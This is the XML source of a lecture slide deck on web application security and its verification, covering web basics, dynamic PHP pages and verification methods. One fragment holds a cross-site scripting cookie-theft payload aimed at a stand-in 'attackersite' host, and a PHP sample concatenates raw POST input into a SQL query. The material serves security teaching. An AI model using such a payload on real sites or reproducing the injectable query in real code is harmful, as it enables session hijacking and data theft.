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59"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId60"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="377" r:id="rId3"/>
    <p:sldId id="408" r:id="rId4"/>
    <p:sldId id="385" r:id="rId5"/>
    <p:sldId id="322" r:id="rId6"/>
    <p:sldId id="395" r:id="rId7"/>
    <p:sldId id="275" r:id="rId8"/>
    <p:sldId id="396" r:id="rId9"/>
    <p:sldId id="397" r:id="rId10"/>
    <p:sldId id="405" r:id="rId11"/>
    <p:sldId id="276" r:id="rId12"/>
    <p:sldId id="334" r:id="rId13"/>
    <p:sldId id="337" r:id="rId14"/>
    <p:sldId id="407" r:id="rId15"/>
    <p:sldId id="398" r:id="rId16"/>
    <p:sldId id="403" r:id="rId17"/>
    <p:sldId id="347" r:id="rId18"/>
    <p:sldId id="332" r:id="rId19"/>
    <p:sldId id="402" r:id="rId20"/>
    <p:sldId id="404" r:id="rId21"/>
    <p:sldId id="406" r:id="rId22"/>
    <p:sldId id="409" r:id="rId23"/>
    <p:sldId id="335" r:id="rId24"/>
    <p:sldId id="338" r:id="rId25"/>
    <p:sldId id="339" r:id="rId26"/>
    <p:sldId id="340" r:id="rId27"/>
    <p:sldId id="341" r:id="rId28"/>
    <p:sldId id="342" r:id="rId29"/>
    <p:sldId id="343" r:id="rId30"/>
    <p:sldId id="344" r:id="rId31"/>
    <p:sldId id="345" r:id="rId32"/>
    <p:sldId id="346" r:id="rId33"/>
    <p:sldId id="348" r:id="rId34"/>
    <p:sldId id="353" r:id="rId35"/>
    <p:sldId id="388" r:id="rId36"/>
    <p:sldId id="394" r:id="rId37"/>
    <p:sldId id="390" r:id="rId38"/>
    <p:sldId id="391" r:id="rId39"/>
    <p:sldId id="392" r:id="rId40"/>
    <p:sldId id="393" r:id="rId41"/>
    <p:sldId id="324" r:id="rId42"/>
    <p:sldId id="355" r:id="rId43"/>
    <p:sldId id="279" r:id="rId44"/>
    <p:sldId id="303" r:id="rId45"/>
    <p:sldId id="359" r:id="rId46"/>
    <p:sldId id="360" r:id="rId47"/>
    <p:sldId id="372" r:id="rId48"/>
    <p:sldId id="315" r:id="rId49"/>
    <p:sldId id="384" r:id="rId50"/>
    <p:sldId id="382" r:id="rId51"/>
    <p:sldId id="383" r:id="rId52"/>
    <p:sldId id="387" r:id="rId53"/>
    <p:sldId id="349" r:id="rId54"/>
    <p:sldId id="327" r:id="rId55"/>
    <p:sldId id="350" r:id="rId56"/>
    <p:sldId id="320" r:id="rId57"/>
    <p:sldId id="321" r:id="rId58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32"/>
    <p:restoredTop sz="92974" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="156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28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54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2022/3/16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2022/3/16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30275" y="741363"/>
            <a:ext cx="4937125" cy="370205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DA2D7-307D-4608-850F-618728A36ADE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CA0F04-902F-4631-A1FE-D429CEDCA954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CA0F04-902F-4631-A1FE-D429CEDCA954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CA0F04-902F-4631-A1FE-D429CEDCA954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84114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CA0F04-902F-4631-A1FE-D429CEDCA954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2949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56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Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{290C3A90-D8D1-4542-88AB-5C3023E05B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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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Web Application Security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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>第二層</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>第三層</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>第四層</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>第五層</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty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56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SDM 2022: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attackersite/collect.cgi?cookie=+document.cookie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w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cwe.mitre.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre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/>
              <a:t>Web Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0"/>
              <a:t>and Its Verification</a:t>
            </a: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zh-TW" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty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/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" dirty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B9AB8B5-84EA-B841-8611-668EF495C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0B36C58-645E-CA41-940F-5EAD012538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Software Safety vs. Security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They are different but related concepts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Safety: no harm is caused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Security: no deliberate harm is caused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Software security is about preventing unwanted or illegal activities in the software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Software security is a means to achieve software safety.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en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Source: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>www.perforce.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>/blog/kw/software-safety-vs-security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>whats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-different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SDM 2022: Web Application Security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762150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Caveats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Concern only with security problems resulted from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program defects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (errors or bad practices)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Will mostly assume using PHP, though there are many languages for programming the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>General interpretation of “Verification”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Testing and simulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Formal verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Static analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Model checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Theorem proving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Manual code review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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>References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auto">
          <a:xfrm>
            <a:off x="357190" y="1571612"/>
            <a:ext cx="2714644" cy="3786214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How the Web Works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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5572164" y="1571612"/>
            <a:ext cx="2143140" cy="3786214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1" name="圓角矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928662" y="1357298"/>
            <a:ext cx="1571636" cy="428628"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg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Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Client side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2" name="圓角矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5857884" y="1357298"/>
            <a:ext cx="1500230" cy="428628"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg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Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>S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erver</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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side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26" name="Picture 2" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j0292020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084" y="2786058"/>
            <a:ext cx="1656056" cy="1571636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2143140" y="3071810"/>
            <a:ext cx="857256" cy="121444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1600" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1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rowser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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500066" y="4214818"/>
            <a:ext cx="857256" cy="49054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1600" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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28" name="Picture 4" descr="C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\8TP1D6DL\MCj0428971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54" y="2428868"/>
            <a:ext cx="1571636" cy="2297373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直線單箭頭接點 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3000396" y="3286124"/>
            <a:ext cx="28575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1" name="直線單箭頭接點 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3000396" y="3643314"/>
            <a:ext cx="2786082" cy="1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 bwMode="auto">
          <a:xfrm>
            <a:off x="3214710" y="2928934"/>
            <a:ext cx="2286016" cy="285752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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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equest for a Web page</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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30" name="Picture 6" descr="C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\OPQ38D2B\MCj0431582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982618">
            <a:off x="6092783" y="3235271"/>
            <a:ext cx="1081375" cy="1081375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7429520" y="2928934"/>
            <a:ext cx="1643074" cy="1928826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400" dirty="0"/>
              <a:t>Retrieve/generate the page, possibly using data from the database and adding client-side scripts to enrich functionalities</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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3" name="矩形 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3214678" y="3714752"/>
            <a:ext cx="2286016" cy="428628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1400" dirty="0"/>
              <a:t>Delivery of t</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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he</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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page in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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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+ scripts</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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31" name="Picture 7" descr="C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\OPQ38D2B\MCj0431582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3929066"/>
            <a:ext cx="914286" cy="914286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1857356" y="4786322"/>
            <a:ext cx="1357322" cy="1214446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400" dirty="0"/>
              <a:t>Display the page and execute client-side scripts on the page </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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1214414" y="2571744"/>
            <a:ext cx="1357322" cy="571504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zh-TW" sz="1400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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nteract with the</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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browser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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橢圓 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4071934" y="2428868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2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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8001024" y="2643182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3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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9" name="橢圓 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4071934" y="4214818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4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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214678" y="5000636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5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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1643042" y="2143116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1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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571472" y="6143644"/>
            <a:ext cx="780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Note: cookies or the equivalent are typically used for maintaining sessions.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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Web Applications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i="1" dirty="0"/>
              <a:t>Web applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> refer mainly to the application programs running on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Part of a Web application may run on the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Together, they make the Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>convenient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>versatile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Online activities enabled by Web applications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Hotel/transportation reservation,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Banking, social networks, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>As required by these activities, Web applications  often involve user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>private and confidential data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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Web Applications: Dynamic Contents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000132" y="1142984"/>
            <a:ext cx="7000892" cy="53578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600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$link =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>localhost’,‘username’,‘password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’);  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connect to database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$db =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_select_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dbname’,$link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fixInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>invoke a user-defined function to sanitize all inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$user=$_POST[‘account’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// fetch and display account information</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$query="SELECT id, name, description  FROM project WHERE  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=‘ ".$user.“ ‘ " ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>while ($result=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_fetch_row</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    echo ‘&lt;table&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>         echo ‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;’;</a:t>
